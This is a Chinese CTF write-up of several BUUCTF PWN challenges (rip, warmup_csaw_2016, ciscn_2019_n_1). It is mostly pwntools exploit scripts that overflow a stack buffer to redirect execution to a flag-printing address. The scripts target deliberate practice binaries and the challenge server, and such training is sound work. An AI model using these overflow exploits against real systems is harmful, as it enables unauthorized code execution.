持续更新 BUUCTF——PWN

test_your_nc

nc 直连
cat flag
1
2

rip

exp

from pwn import *
p = process("./pwn1")
#p = remote("node4.buuoj.cn",28727)
backdoor_address = 0x0000000000401187 # 原本地址为0x0000000000401186，但是会遇到堆栈不平衡 所以+1 改为0x0000000000401187
padding = b"a"*0xf+b"b"*8
#p.sendline("\n")
payload = padding + p64(backdoor_address)
#p.sendlineafter("please input\n",payload)
p.sendline(payload)
p.interactive()
1
2
3
4
5
6
7
8
9
10

warmup_csaw_2016

exp

from pwn import *

#p = process("./warmup_csaw_2016")
p = remote("node4.buuoj.cn",29472)
padding = b"a"*0x40+b"b"*8
cat_flag_addr = 0x40060E # 原本地址为0x40060D，但是会遇到堆栈不平衡 所以+1 改为0x40060E
payload = padding + p64(cat_flag_addr)
p.sendlineafter(">",payload)
p.interactive()
1
2
3
4
5
6
7
8
9

ciscn_2019_n_1

这个有两个exp都能打通。
刚开始并不知道浮点数的十六进制该如何表示，于是向直接跳转到执行system("cat /flag");
exp1

from pwn import *
#p = process("ciscn_2019_n_1")
p = remote("node4.buuoj.cn",28018)
padding = b"a"*(0x30)+b"b"*8
cat_flag_addr = 0x4006BE
payload = padding + p64(cat_flag_addr)
p.sendlineafter("Let's guess the number.",payload)
p.interactive()
1
2
3
4
5
6
7
8

看了网上的博客如果浮点数会保存在程序中，那么程序中也会有其16进制表示，不必纠结该如何转换

exp2

from pwn import *
#p = process("ciscn_2019_n_1")
p = remote("node4.buuoj.cn",28018)
padding = b"a"*(0x30-4)
payload = padding + p64(0x41348000)
p.sendlineafter("Let's guess the number.",payload)
p.interactive()
1
2
3
4
5
6
7